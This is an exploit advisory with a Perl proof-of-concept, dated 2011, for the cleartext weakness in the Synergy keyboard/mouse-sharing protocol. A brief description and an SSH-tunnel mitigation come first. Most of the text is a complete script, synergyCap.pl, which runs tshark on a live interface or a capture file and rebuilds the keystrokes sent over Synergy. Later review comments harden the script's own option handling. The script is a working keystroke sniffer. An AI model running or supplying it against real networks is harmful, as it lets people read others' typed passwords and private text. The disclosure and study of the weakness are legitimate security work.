# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date:April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4
# -= Info =-
*Synergy* is *Free and Open Source Software* that lets you easily share your
mouse and keyboard between multiple computers, where each computer has its
own display. No special hardware is required, all you need is a local area
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~
Synergy-foss.org]
#-= The Advisory =-
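Synergy sends all keystrokes and mouse movements in clear text. This
presents a huge vulnerability because anyone capturing packets on the
network could eavesdrop on all information passed between the multiple
computers. For the affected version, the practical mitigation is to carry the
Synergy connection over an encrypted channel such as an SSH tunnel.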
# -= PoC Script =-
#!/usr/bin/perl
#
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in the Synergy
# Desktop Sharing application
# The program works a lot better when run through a closed network of one type
# or another [such as an SSH tunnel]
# [Note: The recovered text isn't clean. Because of the protocol, text is sent
# in TCP and, even with protocol standards, text does come out of order.]
##########################
#
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
#
##########################
# Usage banner printed at start-up. The text is kept exactly as shipped; a
# non-interpolating heredoc is used so nothing in the ASCII art is expanded.
use constant BANNER => <<'END_BANNER';

/ / synergyCap -> Live or Forensic extractor of text
passeed
/ / from computers using Synergy Screen sharing
/ <( - )> /
/ / PoC Developed by Sw1tCh 2011
/ / -> Need to work on my tshark filters...My perl is
better :)
/ /
Softward -> Synergy - http://synergy-foss.org/
Usage:
- synergyCap.pl -forensic -file [FILE]
- synergyCap.pl -live -interface [device {example eth0} ]
END_BANNER
# ----- INCLUDES ----- #
use strict;
use warnings;
use Getopt::Long;
use Switch;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);
# NOTE(review): the Switch module loaded above is never used in this script.
# It is a source filter that left the Perl core in 5.14, so on a stock modern
# Perl the import fails unless the module is installed separately.

# With AUTORESET set, Term::ANSIColor appends the reset sequence after a
# constant-prefixed print, so the colour does not leak into later output.
local $Term::ANSIColor::AUTORESET = 1;
# Show the usage banner in bold blue on every run, followed by a blank line.
print BOLD BLUE BANNER;
print "\n";
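# ----- OPTIONS ----- #
my $forensic = 0;     # -forensic : read packets from a saved capture file
my $live     = 0;     # -live     : read packets from a network interface
my $pcap_file;        # value given to -file
my $interface;        # value given to -interface
my $capChar  = "";    # every decoded key, appended in arrival order

# -file and -interface carry a value, so they are declared as string options.
# Declared as bare flags, their value was only ever found because it had been
# left behind in @ARGV.
GetOptions(
    'forensic'    => \$forensic,
    'live'        => \$live,
    'file=s'      => \$pcap_file,
    'interface=s' => \$interface,
) or exit 1;

# Work out the tshark input flag and the source that goes with it. -live wins
# when both modes are given, as before. A bare trailing argument is still
# accepted so that existing invocations keep working.
my $tshark_flag;
my @candidates;
if ($live) {
    $tshark_flag = '-i';
    @candidates  = ( $interface, $pcap_file );
}
elsif ($forensic) {
    $tshark_flag = '-r';
    @candidates  = ( $pcap_file, $interface );
}
my ($source) = grep { defined $_ && length $_ } @candidates, $ARGV[0];

unless ( defined $source ) {
    print "ERROR : Bad file or Interface\n";
    exit 1;
}
unless ( $live || $forensic ) {
    print "ERROR : No Option Specified [Live / or / Forensic \n";
    exit 1;
}

# List-form pipe open: tshark is executed directly, without a shell, so
# characters such as ';', '|' or '$(...)' in the file or interface name are
# passed through as data instead of being run as commands. The string-built
# two-argument open this replaces handed the whole command line to the shell.
my @tshark_cmd = ( 'tshark', $tshark_flag, $source, '-V' );
open( my $tshark, '-|', @tshark_cmd )
    or die "Failed to open TSHARK: $!";

# tshark -V prints one decoded field per line; only the "Key Id: N" lines are
# of interest here.
# NOTE(review): assumes the key id is printed as a decimal number - confirm
# against the dissector output of the tshark version in use.
while ( my $line = <$tshark> ) {
    next unless $line =~ /Key Id\x3A\s+(\d+)/;
    my $key_id = $1;

    # Only 7-bit values are turned into characters; larger ids are dropped.
    next unless $key_id < 128;

    my $char = chr $key_id;
    print " " . $char . "\n";
    $capChar .= $char;
}

print "\n\n$capChar ";
print "\n---+ Completed +--- \n";

# close() on a pipe also reports the child's exit status, so a tshark failure
# (unreadable file, missing capture privileges) is surfaced, not lost.
close($tshark)
    or warn "tshark did not exit cleanly (status $?)\n";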
#Credits: Sw1tCh
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's